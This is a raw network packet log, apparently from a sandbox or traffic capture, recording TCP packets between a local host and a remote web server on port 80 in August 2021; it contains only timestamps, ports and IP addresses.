Aug 24, 2021 08:49:17.475625038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475636959 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475641966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475658894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475678921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475697041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475713968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475742102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475749969 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475754023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475759983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475755930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475770950 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475778103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475795984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475811958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475816011 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475828886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475851059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475863934 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475864887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475883007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475898981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475900888 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475914955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475927114 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475930929 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475946903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475964069 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475966930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475984097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475996971 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476001024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476017952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476032019 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476033926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476049900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476061106 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476067066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476083994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476093054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476104021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476114988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476121902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476139069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476155043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476162910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476171970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476188898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476205111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476207972 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476221085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476238966 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476241112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476258993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476274967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476290941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476308107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476324081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476340055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476356030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476375103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476393938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476397991 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476402044 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476403952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476408005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476409912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476418018 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476428032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476444960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476461887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476479053 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476491928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476506948 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476507902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476511002 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476512909 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476525068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476540089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476548910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476557016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476572990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476592064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476593018 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476609945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476625919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476625919 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476641893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476659060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476660013 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476677895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476690054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476694107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476710081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476730108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476747990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476763010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.476857901 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476865053 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.476867914 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.479262114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.479342937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.479361057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.479379892 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.479381084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.479398966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.479413033 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.479414940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.479430914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.479448080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.479463100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.479470968 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.479480028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.479496956 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.479516029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.479532957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.479549885 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.479553938 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.479590893 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.498979092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499013901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499027014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499038935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499053001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499070883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499088049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499104023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499138117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499160051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499171019 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499176979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499193907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499211073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499231100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499249935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499264956 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499272108 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499281883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499298096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499314070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499330044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499345064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499365091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499423981 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499428988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499430895 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499433994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499450922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499466896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499468088 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499485016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499500990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499504089 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499516964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499532938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499541998 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499552965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499572039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499588013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499594927 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499607086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499618053 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499623060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499639988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499655008 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499655962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499672890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499690056 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499692917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499711037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499727964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499727964 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499744892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499758959 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499761105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499778032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499794006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499799967 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499809980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499826908 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499830008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499847889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499860048 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499864101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499881029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499895096 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499897957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499913931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499924898 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499931097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499948025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499953985 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.499968052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499984980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.499989986 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500000954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500015020 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500017881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500034094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500051022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500061035 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500066042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500082016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500101089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500108957 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500118971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500133991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500138998 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500150919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500159979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500166893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500184059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500190973 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500200033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500217915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500217915 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500238895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500253916 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500257015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500272989 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500288963 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500304937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500313997 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500319958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500335932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500349998 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500350952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500370979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500389099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500399113 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500405073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500420094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500436068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500437975 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500452042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500468016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500475883 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500483990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500503063 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500503063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500520945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500529051 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500538111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500555038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500571012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500572920 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500586987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500595093 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500602961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500618935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500619888 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500638962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500653982 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500655890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500678062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500693083 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500694036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500710964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500725985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500740051 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500741959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500758886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500772953 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500782013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500801086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500812054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500817060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500834942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500849009 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500850916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500869036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500883102 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500886917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500902891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500922918 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500922918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500941992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500957012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500957966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500976086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.500978947 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.500992060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501008034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501024961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501032114 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501041889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501061916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501080036 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501080990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501099110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501107931 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501115084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501132011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501148939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501152039 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501167059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501184940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501188040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501207113 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501215935 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501224995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501240969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501251936 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501256943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501274109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501291037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501291990 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501307011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501322985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501323938 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501344919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501353025 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501363039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501379013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501388073 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501396894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501415014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501427889 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501430988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501446962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501456022 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501462936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501485109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501488924 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501502991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501518965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501535892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501553059 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.501553059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501569986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501586914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.501597881 CEST	49712	80	192.168.2.5	212.224.105.79
